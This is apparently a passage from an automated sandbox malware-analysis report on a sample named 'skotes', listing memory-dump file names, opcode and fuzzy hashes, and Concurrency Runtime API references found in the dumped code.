                                                                                                                                                                                                                                                  • Instruction ID: d940645776f04acb0ac5e2cd04c405aa13c1e92b5a8209892357e7356977d91a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a05251013e3277744f9f6aa76efa08acac070d9eea3fcbcaee1b52c7e6beaa8f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F099AF00F308FC9211C984450C6F33F77BB07A303305443F04F4E202E249468A1DA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5470000_skotes.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 91fe37ed7cd90fc62f4e125798d7c9902952e3c23172dc09dfeb64b1469fd120
                                                                                                                                                                                                                                                  • Instruction ID: ec6e9519a9dcc6531efa1dbb25f87895454720f3647e86405f01dacb95312ffb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91fe37ed7cd90fc62f4e125798d7c9902952e3c23172dc09dfeb64b1469fd120
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F0F4BF04F209FD5216CA86560C6F17BABB757330330840BF00F5B701C265128A5E12
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5470000_skotes.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9687033f3293178391edaa8a9ada596eec52b7c5fbe234bed0315278a1e1e3a9
                                                                                                                                                                                                                                                  • Instruction ID: 8d0ed7409a6e684634bffdd271d21c94cb251966bc56734613a4b2f646068e5e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9687033f3293178391edaa8a9ada596eec52b7c5fbe234bed0315278a1e1e3a9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F07DBF00F349EE8302C6A44A096F27F6B6B0B6707344557F44BDF142D355124A4A62
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5470000_skotes.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c3711f93004e168b829e2572affa98e18fe750d9132f691ca3f924e935eef785
                                                                                                                                                                                                                                                  • Instruction ID: bf4465f322e581767abde902dc075ee0ac1784d52ddf6fc056a8adc10eca0a40
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3711f93004e168b829e2572affa98e18fe750d9132f691ca3f924e935eef785
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F0A0AF00F31DFD5196C98A560C5F16BAB67566703308507F40F9E601D389238A5E22
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4706788954.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5470000_skotes.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5667f4d4ff97bbcef0f286d5e90a963552772be603ecc34e95a28ec59f76450a
                                                                                                                                                                                                                                                  • Instruction ID: c852e4733cb28285ca1442760057d3e371a115d693a4bbefff7390f8952f6ec6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5667f4d4ff97bbcef0f286d5e90a963552772be603ecc34e95a28ec59f76450a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18E0C2BF00B30DFC5172D58A650C7F25E6B62966703758143B40FEA200D749335AA822
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00490F16
                                                                                                                                                                                                                                                  • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00490F62
                                                                                                                                                                                                                                                    • Part of subcall function 0049265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00492750
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00490FCE
                                                                                                                                                                                                                                                  • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00490FEA
                                                                                                                                                                                                                                                  • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0049103E
                                                                                                                                                                                                                                                  • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0049106B
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004910C1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                  • API String ID: 2943730970-3887548279
                                                                                                                                                                                                                                                  • Opcode ID: 491e522431c64987625a95a4516f8ff5ff1b81f49ec08934d99c907b29c9f2d6
                                                                                                                                                                                                                                                  • Instruction ID: ea0b30e0a7c1e900fac2003bab6f0c78f076d1da6fe8b968692bbda93dcb967c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 491e522431c64987625a95a4516f8ff5ff1b81f49ec08934d99c907b29c9f2d6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEB17A70A01616EFDF28CF58D981A7ABBB4FB48300F10416FE905AB795D734AD81CB98
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00492CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00492D0F
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00491614
                                                                                                                                                                                                                                                    • Part of subcall function 00492E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00492E39
                                                                                                                                                                                                                                                    • Part of subcall function 00492E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00492EA8
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00491746
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004917A6
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004917B2
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004917ED
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0049180E
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0049181A
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00491823
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0049183B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2508902052-0
                                                                                                                                                                                                                                                  • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                                  • Instruction ID: 6c7c87d192533006d4be20526a57dddcb9357907593ff5fc6666cf3406a30d0c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5814971E00226AFCF18DFA9C684A6EBBF1BF48304B1546AED445A7711C774AD52CB88
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0049EC81
                                                                                                                                                                                                                                                    • Part of subcall function 00498F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00498F50
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0049ECE7
                                                                                                                                                                                                                                                  • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0049ECFF
                                                                                                                                                                                                                                                  • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0049ED0C
                                                                                                                                                                                                                                                    • Part of subcall function 0049E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0049E7D7
                                                                                                                                                                                                                                                    • Part of subcall function 0049E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0049E86F
                                                                                                                                                                                                                                                    • Part of subcall function 0049E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0049E879
                                                                                                                                                                                                                                                    • Part of subcall function 0049E7AF: Concurrency::location::_Assign.LIBCMT ref: 0049E8AD
                                                                                                                                                                                                                                                    • Part of subcall function 0049E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0049E8B5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
